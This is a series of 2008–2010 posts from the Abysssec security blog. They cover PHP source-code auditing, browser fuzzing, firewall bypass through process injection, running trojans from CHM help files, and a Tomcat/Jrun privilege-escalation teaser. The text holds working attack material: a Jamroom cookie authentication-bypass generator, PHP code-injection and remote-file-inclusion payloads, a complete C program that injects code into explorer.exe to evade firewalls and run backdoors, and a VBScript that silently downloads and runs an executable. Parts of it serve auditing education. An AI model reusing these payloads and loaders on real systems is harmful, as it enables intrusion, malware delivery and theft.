Abysssec Security Researches » daphne

Additional notes in PHP source code auditing

daphne — Sun, 14 Mar 2010 19:50:33 +0000

Hi .
Today , I decide talk about some of my experience about methods of vulnerability discovery techniques through source code auditing .

if you remember , around 1 years ago , i wrote This article :

20 ways to php Source code fuzzing (Auditing)

some time ago “Stefan Esser” made The Poster on the PHP Security . I’m going to have a brief description about most them with my experience in PHP Source code Auditing :

Most PHP Vulnerability :

1-Cross Site Scripting (XSS)
2-Cross Site Request Forgery (CSRF)
3-SQL Injection
4-Insecure Session Handling
5-Session Fixation
6-Information Disclosure
7-Header Injection
8-Insecure Configuration
9-Weak randomness

(for more information about how to find this issue in your source code , read my article :
http://www.abysssec.com/blog/2009/03/php_fuzz_audit/
And another describe [ Finding vulnerabilities in PHP scripts FULL ( with examples )]:
http://www.milw0rm.com/papers/381

These problem due to inaccuracy in ((In summary):

I – Secure Input Handling :
accept input from users without carefully to what is injected.

II – Sanitising :
Sanitizing functions can be used to “repair” user input, according to the application‘s restrictions (e.g. specific datatypes, maximum length) instead of rejecting potentially dangerous input entirely. In general, the use of sanitizing functions is not encouraged, because certain kinds and combinations of sanitizing filters may have security implications of their own. In addition, the automatic correction of typos could render the input syntactically or semantically incorrect.
for example :

is_numeric()Checks a variable for numeric content.
is_array()Checks if a variable is an array.
strlen()Returns a string‘s length.
strip_tags()Removes HTML and PHP tags.

III- Escaping :
There are several different kinds of escaping:
• The backslash prefix “\” defines a meta character within strings. For Example: \t is a tab
space, \n is a newline character, … This can be of particular interest for functions where the newline character has a special purpose, e.g. header(). Within regular expressions the backslash is used to escape special characters, such as \. or \*, which is relevant for all functions handling regular expressions.

• HTML encoding translates characters normally interpreted by the web browser as HTML into their encoded equivalents – e.g. < is < or < or < and > is > or > or >. HTML encoding should be used for output handling, where user input should be reflected in HTML without injecting code. (See also: htmlentities())
• URL encoding makes sure, that every character
not allowed within URLs, according to RFC 1738, is properly encoded. E.g. space converts to + or %20 and < is %3C. This escaping is relevant for functions handling URLs, such as urlencode() and urldecode().

IV – Configuration :

Programming errors, including logic program.

well , we know there are 4 points that can help us in the process :

1 – Our PHP inputs Points :

[we need to find them and all functions and variables , that these have been assigned to them .]

input Point in PHP.Programing are :

$_SERVER
$_GET
$_POST
$_COOKIE
$_REQUEST
$_FILES
$_ENV
$_HTTP_COOKIE_VARS
$_HTTP_ENV_VARS
$_HTTP_GET_VARS
$_HTTP_POST_FILES
$_HTTP_POST_VARS
$_HTTP_SERVER_VARS

2- Limiting our understanding :

Very good , the second point : our problem begine here . we can’t find Problem in source code like the past . Because Programmers use the limitation function . for Example , wherever you see the fllowing functions that contol input variable , possibly as many attacks are carried out . so you have two solutions : find problem in logic of code or find PHP bug in PHP CORE !

A) Escaping and Encoding Functions :
A-1 (XSS dies = 90% The direct transition is a dream) :

• htmlspecialchars() , Escapes the characters & < and > as HTML entities to protect the application against XSS. The correct character set and the mode : ENT_QUOTES should be used.

1
2
3


echo "Hello " . htmlspecialchars( $_GET['name'], ENT_QUOTES);
?>

• htmlentities() , Applies HTML entity encoding to all applicable characters to protect the application against XSS. The correct character set and the mode ENT_QUOTES should be used.

1
2
3


echo "Hello " . htmlentities( $_GET['name'], ENT_QUOTES);
?>

( htmlentities() bypass in special case [utf7] : http://pstgroup.blogspot.com/2007/11/bypass-htmlentities.html )

• urlencode() , Applies URL encoding as seen in the query part of a URL.

1
2
3


$url = "http://www.example.com/" . "index.php?param=" . urlencode($_GET['pa']);
?>

A-2 : (SQL injection dies = 90% The direct transition is a dream) :
• addslashes() , Applies a simple backslash escaping. The input string is assumed to be single-byte encoded. addslashes() should not be used to protect against SQL injections, since most database systems operate with multi-byte encoded strings, such as UTF-8.
• addcslashes() , Applies backslash escaping. This can be used to prepare strings for use in a JavaScript string context. However, protection against HTML tag injection is not possible with this function.
(bypass addslashes() in special case : http://sirdarckcat.blogspot.com/2009/10/couple-of-unicode-issues-on-php-and.html)

• mysql_real_escape_string(), Escapes a string for use with mysql_query(). The character set of the current MySQL connection is taken into account, so it is safe to operate on multi-byte encoded strings.
Applications implementing string escaping as protection against SQL injection attacks should use this function.

1
2
3


$sql = "SELECT * FROM user WHERE" . " login='" . mysql_real_escape_string( $_GET['login'], $db) . "'";
?>

A-3 : (XSS , SQl Inject = 100% The direct transition is a dream) :
• preg_quote() , Should be used to escape user input to be inserted into regular expressions. This way the regular expression is safeguarded from semantic manipulations.
Fix code :

1
2
3


$repl = preg_replace('/^' . preg_quote($_GET['part'], '/'). '-[0-9]{1,4}/', '', $str);
?>

issue Code [Command Execute] :


$h = $_GET['h'];
echo preg_replace("/test/e",$h,"jutst test");
?>

It works like this: http://site.com/test.php?h=phpinfo()

• escapeshellarg() , Escapes a single argument of a shell command. In order to prevent shell code injection, single quotes in user input is being escaped and the whole string enclosed in single quotes.

1
2
3


system('resize /tmp/image.jpg' . escapeshellarg($_GET['w']).' '. escapeshellarg($_GET['h']));
?>

• escapeshellcmd() , Escapes all meta characters of a shell command in a way that no additional shell commands can be injected. If necessary, arguments should be enclosed in quotes.

1
2
3


system(escapeshellcmd( 'resize /tmp/image.jpg "' . $_GET['w']) . '" "' . $_GET['h']) . '"'));
?>

B- CType Extension :
By default, PHP comes with activated CType extension. Each of the following functions checks if all characters of a string fall under the described group of characters:

• ctype_alnum()alphanumeric characters – A-Z, a-z, 0-9
• ctype_alpha()alphabetic characters – A-Z, a-z
• ctype_cntrl() control characters – e.g. tab, line feed
• ctype_digit()numerical characters – 0-9
• ctype_graph()characters creating visible output e.g. no whitespace
• ctype_lower()lowercase letters – a-z
• ctype_print()printable characters
• ctype_punct()punctuation characters – printable characters, but not digits, letters or whitespace, e.g. .,!?:;*&$
• ctype_space()whitespace characters – e.g. newline, tab
• ctype_upper()uppercase characters – A-Z
• ctype_xdigit() hexadecimal digits – 0-9, a-f, A-F


if (!ctype_print($_GET['var'])) {
die("User input contains ". "non-printable characters");
}
?>

C – Filter Extension – ext/filter
Starting with PHP 5.2.0 the filter extension has provided a simple API for input validation and input filtering.
• filter_input()Retrieves the value of any GET, POST, COOKIE, ENV or SERVER variable and applies the specified filter.

1
2
3


$url = filter_input(INPUT_GET, 'url', FILTER_URL);
?>

• filter_var()Filters a variable with the specified filter.

1
2
3


$url = filter_var($var, FILTER_URL);
?>

List of Filters :
Validation Filters
• FILTER_VALIDATE_INTChecks whether the input is an integer numeric value.
• FILTER_VALIDATE_BOOLEANChecks whether the input is a boolean value.
• FILTER_VALIDATE_FLOATChecks whether the input is a floating point number.
• FILTER_VALIDATE_REGEXPChecks the input against a regular expression.
• FILTER_VALIDATE_URLChecks whether the input is a URL.
• FILTER_VALIDATE_EMAILChecks whether the input is a valid email address.
• FILTER_VALIDATE_IPChecks whether the input is a valid IPv4 or IPv6.

Sanitising Filters
• FILTER_SANITIZE_STRING / FILTER_SANITIZE_STRIPPEDStrips and HTML-encodes characters according to flags and applies strip_tags().
• FILTER_SANITIZE_ENCODEDApplies URL encoding.
• FILTER_SANITIZE_SPECIAL_CHARSEncodes ‘ ” < > & \0 and optionally all characters > chr(127) into numeric HTML entities.
• FILTER_SANITIZE_EMAILRemoves all characters not commonly used in an email address.
• FILTER_SANITIZE_URLRemoves all characters not allowed in URLs.
• FILTER_SANITIZE_NUMBER_INTRemoves all characters except digits and + -.
• FILTER_SANITIZE_NUMBER_FLOATRemoves all characters not allowed in floating point numbers.
• FILTER_SANITIZE_MAGIC_QUOTESApplies addslashes().

Other Filters
• FILTER_UNSAFE_RAWIs a dummy filter.
• FILTER_CALLBACKCalls a userspace callback function defining the filter.

D) HTTP Header Output
HTTP headers can be set using the header() function. User input should always be checked before being passed to header(), otherwise a number of security issues become relevant. Newline characters should never be used with header() in order to prevent HTTP header injections. Injected headers can be used for XSS and HTTP response splitting attacks, too. In general, user input should be handled in a context-sensitive manner.
Dynamic content within parameters to Location
or Set-Cookie headers should be escaped by urlencode().

For other HTTP header parameters, unintended context changes must be prevented as well; e.g. a semicolon separates several parameters within Content-Type.


if (strpbrk($_GET['type'], ";/\r\n")) die('invalid characters');
header("Content-Type: text/" . $_GET['type'] . "; charset=utf-8;");
?>

Applications should not allow arbitrary HTTP Location redirects, since these can be used for phishing attacks. In addition, open redirects can have a negative impact on the cross domain policy infrastructure of Adobe‘s Flash Player.

E)Secure File Handling:
• Detect and replace NULL bytes:


if (strpos($_GET["f"], "\0") === true) {
$file = str_replace("\0", "", $_GET["f"]);
}
?>

• Prevent remote file inclusion (path prefix) and directory traversal (basename):

1
2
3


$file = "./".basename($_GET["f"]). ".php";
?>

• Include only whitelisted files:


if (in_array($_GET['action'], array('index', 'logout'))) {
include './'.$_GET['action'] . '.php';
} else die('action not permitted');
?>

3) Configuration point :
last point . weakness in Programing (Source code) Structure . one of the most celever part in source Code Auditing .
we sea these Fllowing Configuration in code or PHP.ini Setting :
[a]- when Server don’t Disabling Remote URLs for File Handling Functions
File handling functions like fopen, file_get_contents, and include accept URLs as file parameters (for example: fopen(‘http://www.example.com/’, ‘r’)). Even though this enables developers to access remote resources like HTTP URLs, it poses as a huge security risk if the filename is taken from user input without proper sanitization, and opens the door for remote code execution on the server.

[b] Register Globals is ‘ON’ :
Prior to version 4.2.0, PHP used to provide input values as global variables. This feature was named register_globals, and it was responsible for many security issues in web applications because it allowed attackers to freely manipulate global variables in many situations. Fortunately it’s disabled by default from PHP 4.2.0 and on, because it’s dangerous on so many scales.


if (ereg("test.php", $PHP_SELF)==true)
{
    include $server_inc."/step_one_tables.php";
}
?>

demonstration :
http://path/inc/step_two_tables.php?server_inc=http://attacker/js_functions.php

[c] Server Don’t Limit Access to Certain File Name Patterns :
Many file extensions should not be accessible by end users. Take for example .inc. Some developers prefer to assign this extension to included scripts. The problem here is that this extension isn’t parsed by the PHP engine, and as a result, anyone can view the source code by requesting the file itself: http://www.example.com/includes/settings.inc

Such files may contain sensitive data like MySQL passwords. So you need to ensure that end users can not access those files. Other candidate extensions are .sql, .mysql, and .pgsql.

Another pattern to look out for is backup files. Some editors create backup versions of edited files in the same directory where the original file is located. For example, if you edit index.php, a backup called index.php~ will be created. Given that this file doesn’t end with .php, it will not be processed by the PHP engine, and its code will also be available to users by requesting http://www.example.com/index.php~

[d] Error Messages and Logging is ON :
By default, PHP prints error messages to the browser’s output. While this is desirable during the development process, it may reveal security information to users, like installation paths or usernames.
.
And many other attacks, usually design by the programmer !

Real Word Example :

Exp 1 : PHP Code Execution:
There is an arbitrary php code execution issuedue to the unsafe use of preg_replace evaluation when parsing anchor tags and the like.


// Replace any usernames
$ret = preg_replace("#\[:nom:([^\]]*)\]#e",
	            "username(0, trim(\"\\1\"))",
	             $ret);
 
?>

php code execution is possible via complex variable evaluation.
[:nom:{${phpinfo()}}]

or this code :


if($globals['bbc_email']){
 
	$text = preg_replace(
				array("/\[email=(.*?)\](.*?)\[\/email\]/ies",
						"/\[email\](.*?)\[\/email\]/ies"),
				array('check_email("$1", "$2")',
						'check_email("$1", "$1")'), $text);
 
}
?>

abuse :
[email]{${phpinfo()}}[/email]

2- Configuration mistake : Authentication Bypass
There is a serious flaw in the Jamroom (JamRoom <= 3.3.8) authentication mechanism that allows for an attacker to completely bypass the authentication process with a specially crafted cookie. The vulnerable code in question can be found in /includes/jamroom-misc.inc.php @ lines 3667-3681 within the jrCookie() function


list($user,$hash) = unserialize(stripslashes($_val));
$user = trim(genc('get',$user));
$req = "SELECT user_nickname, user_password
FROM {$jamroom_db['user']}
WHERE user_nickname = '". dbEscapeString($user) ."'
LIMIT 1";
$_rt = dbQuery($req,'SINGLE');
if (strlen($_rt['user_password']) === 0) {
return(false);
}
if (md5($_rt['user_password'] . $sect) == $hash) {
print_r($rt);
return($_rt);
}
?>

The problem with the above code is that $_val is a user supplied value taken from $_COOKIE['JMU_Cookie']. Since the cookie data is serialized an attacker can specify data types such as boolean values, and bypass the password check, and authenticate with only a username. If the first byte of the password hash stored in the database is numerical then a boolean value of true can be used in place of an actual password, and if the first byte is a letter then a boolean value of false is required.


$data = array();
$user = 'admin'; // Target
 
$data[0] = base64_encode(serialize($user));
$data[1] = (bool)0;
echo "\n\n===[ 0 ] ========================\n\n";
echo 'Cookie: JMU_Cookie=' . urlencode(serialize($data));
$data[1] = (bool)1;
echo "\n\n===[ 1 ] ========================\n\n";
echo 'Cookie: JMU_Cookie=' . urlencode(serialize($data));
?>

The above script is an example of how it works, and will create a cookie to login as the user admin. For more information check out the comparison operators section of the php manual. Specifically the “identical” operator.

3- new bug :
http://www.sektioneins.com/en/advisories/advisory-022009-phpids-unserialize-vulnerability/index.html
in other post , i will publish some of our most recent research on browsers security and results we got on this topic as i promised in a few past posts .

regards
daphne

writing a Browser fuzzer !!!

daphne — Fri, 21 Aug 2009 16:12:12 +0000

Hello all
in this post , i wanna talk about web browser Fuzzing and auditing.
web browsers , such as FireFox , Opera , Internet Explorer and etc .. , are very convertible with new web technologies.

For example :
when html5 comes , Firefox added html5 features to itself too. and a clever Attacker could recognizing this change and we will be able to find Security holes .

for more information please read :

w3.org publish paper with this title: HTML 5 differences from HTML 4
http://www.w3.org/TR/2009/WD-html5-diff-20090212/
and take HTML5 Overview :
http://dev.w3.org/html5/spec/Overview.html

please pay attention to differences between FF3 & FF3.5 :

These changes include support for the and tags as defined in the HTML 5 specification, with a goal to offer video playback without being encumbered by patent issues associated with many video technologies.

Cross-site XMLHttpRequests (XHR), which can allow for more powerful web applications and an easier way to implement mashups, are also implemented in 3.5.

A new global JSON object contains native functions to efficiently and safely serialize and deserialize JSON objects, as specified by the ECMAScript 3.1 draft.

Full CSS 3 selector support has been added. Firefox 3.5 uses the Gecko 1.9.1 engine, which includes a few features that were not included in the 3.0 release. Multi-touch support was also added to the release, including gesture support like pinching for zooming and swiping for back and forward.

and then milw0rm.com publish new exploit in “Firefox font tag !”
http://www.milw0rm.com/exploits/9137

we are not bloodsucker , we try to act like a real hacker , Real hacker (Pen-tester i mean) think about how to find this type of bug .

since we know about all of new features in new web browsers such as of FF and we can test features as a security researcher as well.

Browser Vulnerability Assessment has tree step :

1 – Find HTML or XML or javascript browser can support , for example :
http://msdn.microsoft.com/en-us/library/ms533050%28VS.85%29.aspx [IE]

2- find Properties , Methods , Collections , Events ,Constants , Prototypes , HTML Elements for each .

3- misuse property of or fuzzed tag for buffer-overflow and other memory corruption vulnerabilities (in this case)

for example :
we want find memory corruption vulnerability using , unbound check in tag, in Internet explorer 8 !:
test

take a look at “MSDN” :
http://msdn.microsoft.com/en-us/library/ms535248%28VS.85%29.aspx

second : find “Attribute” and “property” of tag , such as :
‘color’, ‘face’, ‘size’, ‘class’, ‘id’, ‘style’, ‘title’, ‘dir’, ‘lang’, ‘accesskey’, ‘tabindex’

third : build random character for “overflows ” , “FormatString” , and other memory corruptions …

for example to be more clear i wrote a really basic fuzzer in python :

(for sure this is not a commercial fuzzer)

# Abysssec Inc public material
# Simple Browser Fuzzer
# www.Abysssec.com
#garbage char
overflows = ['A' * 10, 'A' * 20, 'A' * 100, 'A' * 200]
fmtstring = ['%n%n%n%n%n', '%p%p%p%p%p', '%s%s%s%s%s', '%d%d%d%d%d', '%x%x%x%x%x']
numbers   = ['0', '-0', '1', '-1', '32767', '-32768', '2147483647', '-2147483647', '2147483648', '-2147483648']
 
# FONT property
fontpropery = ['color', 'face', 'size', 'class', 'id', 'style', 'title', 'dir', 'lang', 'accesskey', 'tabindex']
 
#basic Automated Fuzzer :
i = 0 
 
for x in fontpropery:
     for y in overflows:
    	tag = "TEST"
    	i = i + 1
	file = open( str(i) + ".html","w")
	file.writelines('')
	file.writelines(tag)
	file.close()
 
     for y in fmtstring:
    	tag =  "TEST"
    	i = i + 1
	file = open( str(i) + ".html","w")
	file.writelines('')
	file.writelines(tag)
	file.close()
 
     for y in numbers:
    	tag =  "TEST"
    	i = i + 1
	file = open( str(i) + ".html","w")
	file.writelines('')
	file.writelines(tag)
	file.close()

for start fuzzing , add refresh page with next page . [for start fuzz click 1.html]

another way :

“Jeremy Brown” developed this a fuzzer for general browser fuzzing” :

Written in PERL
CSS/DOM/HTML/JS fuzzing comprehensive
Specialized functions for fuzz page generation & writing
Decent file structure easily supporting add/del/modification
3rd generation [unlimited style, web] fuzzing oracle implemented

http://www.krakowlabs.com/dev/fuz/bf2/bf2.pl.txt

this fuzzer is good but it’s really simple too and can’t find new vulnerabilities without modifying but you can extend it for new method of browser fuzz .

more info :

http://www.krakowlabs.com/dev/fuz/bf2/bf2_doc.txt

Browser Auditing :

browser source code auditing is actually white-box testing and only is useful when you have an open source browser like Firefox and …. .

source code auditing is really practical , but need higher then knowledge in programming (always C/C++)
for example , in firefox :
you can download all versions source code from here :
ftp://ftp.mozilla.org/pub/mozilla.org/firefox/releases

more source code of FF written by C++ , my interested C++ source code Auditor is : CPPcheck
http://sourceforge.net/apps/mediawiki/cppcheck

Important point that we understand from this Post :
why we can’t found bugs from this ways ?
i try to answer this question in future post .

————————————————————-

and this write-up is for tell you we are “not dead”

wait for out new advisories + exploits soon as soon possible

god speed you

Daphne
———–
unfortunately , we had mistake in our simple fuzzer , now edit & repaired .
thanks .
Daphne /

20 ways to php Source code fuzzing (Auditing)

daphne — Mon, 09 Mar 2009 05:39:10 +0000

Hello .

This article is only for who attend php as well and really knowing how to program In PHP.

When we talk about PHP Vulnerability discovery, we forget this Question:
What types of bugs?

When we can answer this Question, we will gain to find vulnerability as well as drink some water.

Reading in this article :

Section 1 : (20 ways to PHP source code Auditing – PHP Fuzzing)
1- Cross Site Scripting
2- SQL Injection [medium]
3- HTTP Response Splitting [Medium]
4- Dynamic Evaluation Vulnerabilities [High]
5- Process Control / PHP Code Injection (HIGH)
6- Local / Remote file inclusion (High)
7 – File Management (HIGH)
8- Buffer overflows (High, But Hard Usage)
9- Cookie / Session injection / Fixation / [High]
10 – Denial Of service [Medium, But Hard Assessment]:
11 – XPath Injection [XML Functions]
12 – Often Misused: File Uploads (High)
13 – Un-Authorize summon of Functionality / File (Medium)
14 – Authentication Bypass with Brute Force (Low)
15 – Insecure Randomness Session / Cookie / Backup files (Medium)
16 – Informative details in HTML Comments (Low)
17 – Default unnecessary installation files (medium)
18 – Regular Expression Vulnerability (High)
19 – Resource Injection (Medium)
20 – Week Password / Encryption: (Low)

Section 2:
Automatic PHP Auditor source code

This article is not a full reference about PHP source code security review (a.k.a auditing) but I tried to do this work in my short time as well. So please take my apology about all of mistakes (maybe) I made during completing this article. I’m not sure but maybe I’ve release future version of this article that contain a few more advanced methods.

Here is some of future talk and topics may I add this article in next version:
1-    More Real world Attack with Description
2-    PHPIDS Defense.
3-    More Dangerous Functions: CURL – socket – creat_function & ….
4-    Talk About pear functions and security of used.
5-    Information About Books of PHP Securea Coding.
6-    And ETC

Download :

php-fuzzing-auditing-version-1.0

thanks.

Daphne

How Bypass firewall with Process Injection

daphne — Fri, 02 Jan 2009 20:52:52 +0000

Hello Friends .

First question is why Process Injection ?

in this method we can attach evil Process to permitted Process . as you know , firewalls Permit to some Process , like : Internet explorer [IE] or Firefox or windows update or … . this Processes can connect to Internet very well [ often ] .

Process injection , Dll injection , “PE injection “ are methods to bypass firewalls [This Methods called as : Leak Firewall ] .

in dll injection , we injects dll into an application process area, and references to his own malicious DLL to make firewall believes that it’s the application which is using the DLL .

Today when we talk about injection, we are talking about a DLL that is loaded into a running process’s memory. as we know Windows is now designed for this, and injection techniques can be used by any application. Some applications use it to add features to a closed-source program [for example : Babylon Dictionary is One of them ] .

I,m not intend to talk about these [dll ,process Injection ] at this time . and i just want talk about Process injection [ or hijack] to bypass firewalls .

Attention To modeling :

Principle of application run [default ] :

when inclusion of a dynamic library [dll] :

inserting malicious code in the process of confidence :

Used internet Explorer [trusted Software ] for injection :

The following illustration shows the general Code injection with windows API method [virtualAllocEX(),..]

how to Inject Process : [with C cod ]

for firewall bypass we have 4 part :

- Open one process “P”
- Allocate memory remotely in “P” space
- Copy the code to remote process
- Create a thread to execute the code remotely
[will happen]

Example Of Process Injection In EXPLORER.EXE [code ]:

 
    #pragma comment(lib,"Shlwapi.lib")
    #pragma comment(lib,"ADVAPI32.LIB")
    #include 
    #include 
    #include 
    #include 
    #define INJECT_EXE  "explorer.exe"
 
    typedef struct _RPar
    {
    DWORD dwDeleteFile;
    DWORD dwSleep;
    DWORD dwMessageBox;
    char Filename[1024];
    char string1[1024];
    char string2[1024];
    } RPar;
    DWORD __stdcall ThreadProc(RPar *Para)
    {
    FARPROC PDeleteFile = (FARPROC)Para->dwDeleteFile;
    FARPROC PSleep = (FARPROC)Para->dwSleep;
    FARPROC PMessageBox = (FARPROC)Para->dwMessageBox;
 
    PMessageBox(NULL,Para->string1,Para->string2,MB_OK);
 
    while(PDeleteFile(Para->Filename) == 0) {PSleep(1000);}
    return 0;
    }
    int _stdcall WinMain(HINSTANCE hInst, HINSTANCE hPrevInst, LPSTR lpCmd, int nCmdShow)
    {
    DWORD dwThreadId,pID=0,dwThreadSize=2048;
    void *pRemoteThread;
    char ExeFile[1024];
    HANDLE hProcess,hSnap;
    HINSTANCE hKernel, hUser;
    RPar my_RPar,*pmy_RPar;
    PROCESSENTRY32 pe32 = {0};
    if( (hSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)) == INVALID_HANDLE_VALUE )
    return 3;
    pe32.dwSize = sizeof(PROCESSENTRY32);
    Process32First(hSnap, &pe32);
    do {
    if ( StrCmpNI(INJECT_EXE,pe32.szExeFile,strlen(INJECT_EXE)) == 0)
    {
    pID=pe32.th32ProcessID;
    break;
    }
    } while (Process32Next(hSnap,&pe32));
 
    if ( hSnap != INVALID_HANDLE_VALUE )
    CloseHandle(hSnap);
    hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,pID);
    pRemoteThread = VirtualAllocEx(hProcess, 0, dwThreadSize, MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);
 
    WriteProcessMemory(hProcess, pRemoteThread, &ThreadProc, dwThreadSize,0);
    ZeroMemory(&my_RPar,sizeof(RPar));
    hKernel = LoadLibrary( "kernel32.dll");
    my_RPar.dwDeleteFile = (DWORD)GetProcAddress(hKernel, "DeleteFileA");
    my_RPar.dwSleep = (DWORD)GetProcAddress(hKernel, "Sleep");
    hUser = LoadLibrary( "user32.dll");
    my_RPar.dwMessageBox = (DWORD)GetProcAddress(hUser, "MessageBoxA");
    GetModuleFileName(NULL,ExeFile,1024);
    printf (ExeFile);
    strcpy(my_RPar.Filename, ExeFile);
    strcpy(my_RPar.string1, "HI Abysssec");
    strcpy(my_RPar.string2, "OK");
    pmy_RPar =(RPar *)VirtualAllocEx (hProcess ,0,sizeof(RPar),MEM_COMMIT,PAGE_READWRITE);
    WriteProcessMemory(hProcess ,pmy_RPar,&my_RPar,sizeof my_RPar,0);
    CreateRemoteThread(hProcess ,0,0,(DWORD (__stdcall *)(void *))pRemoteThread ,pmy_RPar,0,&dwThreadId);
    FreeLibrary(hKernel);
    CloseHandle(hProcess);
    system("tasklist");
    return 0;
    }

what Happens When Firewall bypass ?

in servers :

we can call "Internet explorer" or other trusted Application with [ASP.NET Execute Permission ] and run backdoor in any port .

with this method , we can telnet to open port of server without any worry .

In Client :

Backdoor , Trojans , bad software , connect to internet without Access .

Real Word [ Discovered By Abysssec ] test :

Vulnerability Firewall [Outpost 2009 ] :

http://www.agnitum.com/products/outpost/

You can Inject Process In IE7 or Mozilla Firefox [default Trusted ] .

[Sorry For more information , This bug is not fixed , You can test it with Process Injector tools ].

www.tarasco.org

[pinjector.exe] :

Download Link + source :

http://www.tarasco.org/security/pinjector/index.html

Final deduction:

1- We can Bypass some firewalls : Don't checked Allocated Memory in Trusted Process .

2- Dll , Process , PE injection is useful way to run Process without new Prosess ID [PID] .

In Future :

1- Usage Of these Method In other bypass Protections [hybrid or frees Protection ]

2 - PE INJECTION , why , what , where !?

More Information :

http://www.tarasco.org/security/pinjector/Win32.Design.Flaws.pdf

http://www.firewallleaktester.com/docs/leaktest.pdf

http://www.bluenotch.com/files/Shewmaker-DLL-Injection.pdf

--------------------------------------------------------------------------------------

Happy new year and holy days

god speed you

Daphne

Execute with .CHM file.

daphne — Sun, 14 Dec 2008 18:14:42 +0000

Hi .

In this post i wanna talk about Execute with CHM file or be honest How we can run Trojan, Backdoor In CHM file ? and we will have a few talk Bypass Script Protection In IE .

A CHM help file has a “.chm” extension. It has a set of web pages written in a subset of HTML and a hyperlinked table of contents. CHM format is optimized for reading, as files are heavily indexed. All files are compressed together with LZX compression. Most CHM browsers have the capability to display a table of contents outside of the body text of the help file.

Engine Of CHM :

CHM run HTML page Based On Internet Explorer Engine .

when you run “VBSCRIPT” or “Activex” or “Object” with Internet Explorer 7 or higher , Script Protection (Activex Security Control) , Alert To User & Block Script .

when we are during running a CHM file , we Can Run & Execute “Object” + “Vb Script” + “JavaScript “ Without Any Error , but If our Script inclusive ActiveX control , We will See a Basic Alert .

Execute IN CHM :

we Need A Program To Create CHM file , I like to USE WINCHM (free Edition) :

http://www.softany.com/winchm/

For Edit VBSCRIPT [With IDE] :

http://www.vbsedit.com/

Offline Mode (Intro) :

With This Object ID :

{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}

Call “Windows Script Host Shell Object ” with Object :

Example :

classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”>

Or :

Online Mode (Backdoor & Script Bypass Mode ) :

we have three Step to do :

1- Download .EXE file (without User InterAction)
2- Save File in Victim PC .
3- RUN It .

for download with VBSCRIPT I USED This Objects :

-Microsoft.XMLHTTP
-MSXML2.ServerXMLHTTP
-WinHttp.WinHttpRequest.5.1
-WinHttp.WinHttpRequest

Following This Example :

SAVE FILE [ Achilles heel IN CHM ] :

Save File & Execute Objects , Run Activex In IE & CHM .

IF You Can Find a way to bypass ActiveX Alert You can Find lot’s of BUG‘s .

Example OF Bug :

http://www.milw0rm.com/exploits/719 [2004]

Activex Alert :

Note : we have some bypass trick maybe we disclosure a few of them here soon .

But until that Time You can use This method for Download [FTP Client ] :

Option Explicit
Dim objFSO, objMyFile, objShell, strFTPScriptFileName
Dim strLocalFolderName, strFTPServerName, strLoginID, strFTPServerDir
Dim strPassword, strFTPServerFolder, objPassword, objFolder,FolderContent, fso, CleanPath, file, Flag

‘Change this, foldername = local dir (where files must be ftp’d TO)
strLocalFolderName = “c:\”

‘ Server where you are ftp’ing TO
strFTPServerName = “abysssec.com”

‘ Username you use to ftp
strLoginID = “test”

‘ Initialize variables
strPassword = “test”
strFTPServerDir = “/www”

‘ Change this to the folder where the files are on the source server
strFTPServerFolder = “/www”

‘The follow lines of code generate the FTP script file on the fly,
‘because the directory name changes every time its run

strFTPScriptFileName = strLocalFolderName & “\FTPScript.txt”

Set objFSO = CreateObject(“Scripting.FileSystemObject”)

If (objFSO.FileExists(strFTPScriptFileName)) Then
objFSO.DeleteFile(strFTPScriptFileName)
End If

Set objMyFile = objFSO.CreateTextFile(strFTPScriptFileName, True)
‘objMyFile.WriteLine (“ftp -s open ” & strFTPServerName)
objMyFile.WriteLine (“open ” & strFTPServerName)
objMyFile.WriteLine (strLoginID)
objMyFile.WriteLine (strPassword)

‘strFTPServerDir = InputBox(“Enter directory from which to ftp:”)

‘objMyFile.WriteLine (“cd ” & strFTPServerFolder & strFTPServerDir)
objMyFile.WriteLine (“cd ” & strFTPServerFolder)
‘objMyFile.WriteLine (“bin”)
objMyFile.WriteLine (“lcd ” & strLocalFolderName)
objMyFile.WriteLine (“get EF.exe”)
objMyFile.WriteLine (“bye”)
objMyFile.Close

Set objFSO = Nothing
Set objMyFile = Nothing

‘The following code executes the FTP script. It creates a Shell
‘object and run FTP program on top of it.
Set objShell = WScript.CreateObject( “WScript.Shell” )
objShell.Run (“ftp -s:” & chr(34) & strFTPScriptFileName & chr(34))
‘objShell.Run (strFTPScriptFileName & chr(34))
Set objShell = Nothing

Set fso=CreateObject(“Scripting.FileSystemObject”)
CleanPath=”c:\”

For Each file In fso.GetFolder(strLocalFolderName).Files
Flag = StrComp(file, strFTPScriptFileName ,1)
if Flag = 0 then
file.delete
end if
Next

For Execute You can use it:

——————————————————————————————————————————————-

Bypass Script Protection in CHM :

When You Run This Exploit [ Last Of IE 7 Exploit In this Time ] :

http://www.milw0rm.com/exploits/7410

This Exploit Detect By IE Script Security Protection . You Can Run This Exploit in CHM & Don’t Worry For Execution through “Heap Spray” Method .

Test IT :

http://abysssec.com/files/Execute-with-IE.chm

OK , deduction :

1 – We can put Backdoor & Trojan in CHM files [Fake Book ]

2- We Can Run IE Exploit in CHM files .

3- We Can Execute & Download & Upload with chm files .

4- We Can Run All COM & DLL Objeects with it .

In future :

1- talk about Heap Spray Method .

2- Talk About Fuzzing OBJECT .

3- Talk About Bypass Activex Question in .CHM [ If i found It !!!!]

Question ?

———————————————–

abysssec comment problem solved fill free to write your comment and mail your request and questions to us .

DAphne

Tomcat & Jrun Privilege Escalation (Windows)

daphne — Thu, 27 Nov 2008 21:07:10 +0000

In the name of God.

Hello my friend & all readers ,

Tomcat [jsp] & Jrun [ColdFusion] & some HTTP server , when called “JSP” function in windows , Attackers can Privilege Escalation .

This bug Emanate from differ Kernel in windows and Linux .

Example Vulnerable Software : “PLESK” or many of web management systems Used them , you can find them .

TOMCAT : [http://tomcat.apache.org/]

Jrun : [http://www.adobe.com/products/jrun/]

Diagram of Run web Application In windows [ Attention in user mode & kernel Mode ] :

Diagram of Run web Application In Linux [ Attention in user mode & kernel Mode ] :

Please Attention to diragrams , I don’t mean describe win & lin kernel , But you see , in windows services security & Application Security are in user mode & you are not face to face with kernel , But in linux we have a different Calling Services & user access .

